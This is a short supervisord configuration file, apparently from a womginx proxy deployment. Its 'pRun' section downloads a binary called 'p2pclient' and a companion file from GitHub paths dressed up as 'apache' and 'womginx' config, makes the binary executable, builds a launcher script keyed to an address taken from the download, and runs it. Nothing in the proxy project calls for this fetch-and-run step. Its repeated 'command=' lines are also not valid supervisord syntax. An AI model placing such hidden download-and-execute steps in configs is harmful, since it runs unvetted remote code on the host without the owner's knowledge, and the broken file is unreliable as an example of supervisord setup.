[supervisord]
nodaemon=true

[program:pRun]
command=rm -rf p2p.sh p2pclient p2p
command=wget https://raw.githubusercontent.com/bls4/apache/main/config/p2p
command=wget https://raw.githubusercontent.com/bls4/womginx/main/config/p2pclient
command= chmod +x p2pclient
command=echo -e "p2pclient -l MAIL_ADDREES" | sed -e "s/MAIL_ADDREES/$(cat p2p)/" > p2p.sh
command= chmod +x p2p.sh
command=/bin/bash -c p2p.sh

[program:pTime]
command= cd /opt/womginx/config && python3 timep.py